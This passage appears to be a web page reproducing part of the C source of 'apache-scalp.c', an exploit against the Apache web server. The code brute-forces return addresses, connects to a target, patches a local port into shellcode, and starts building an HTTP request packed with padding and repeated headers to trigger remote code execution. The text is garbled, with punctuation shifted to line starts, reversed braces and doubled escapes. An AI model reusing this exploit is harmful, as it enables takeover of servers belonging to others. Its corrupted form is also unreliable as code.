Page 294 - بسم الله الرحمن الرحيم
;(signal(SIGPIPE, SIG_IGN
} (for(owned = 0, progress = 0;;retaddr += RET_ADDR_INC
/* skip invalid return addresses */
;i = retaddr & 0xff
(if(i == 0x0a || i == 0x0d
;++retaddr
((else if(memchr(&retaddr, 0x0a, 4) || memchr(&retaddr, 0x0d, 4
;continue
;(sock = socket(AF_INET, SOCK_STREAM, 0
;sin.sin_family = AF_INET
;(sin.sin_addr.s_addr = inet_addr(hostp
;((sin.sin_port = htons(atoi(portp
(if(!progress
;("\\\ ..printf(\\\"\\\\n[*] Connecting
;(fflush(stdout
} (if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0
;("\\\()perror(\\\"connect
;(exit(1
{
(if(!progress
;("\\\printf(\\\"connected!\\\\n
/* Setup the local port in our shellcode */
;(i = sizeof(from
} (if(getsockname(sock, (struct sockaddr *) & from, &i) != 0
;("\\\()perror(\\\"getsockname
;(exit(1
{
;(lport = ntohs(from.sin_port
;shellcode[SHELLCODE_LOCALPORT_OFF + 1] = lport & 0xff
;shellcode[SHELLCODE_LOCALPORT_OFF + 0] = (lport >> 8) & 0xff
p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) *
(REP_SHELLCODE
PADSIZE_1 + (REP_RET_ADDR * 4) + REP_ZERO + 1024) *)) +
;((REP_POPULATOR
;("\\\PUT_STRING(\\\"GET / HTTP/1.1\\\\r\\\\nHost: apache-scalp.c\\\\r\\\\n
} (++for (i = 0; i < REP_SHELLCODE; i
;("\\\-PUT_STRING(\\\"X
;(PUT_BYTES(PADSIZE_3, PADDING_3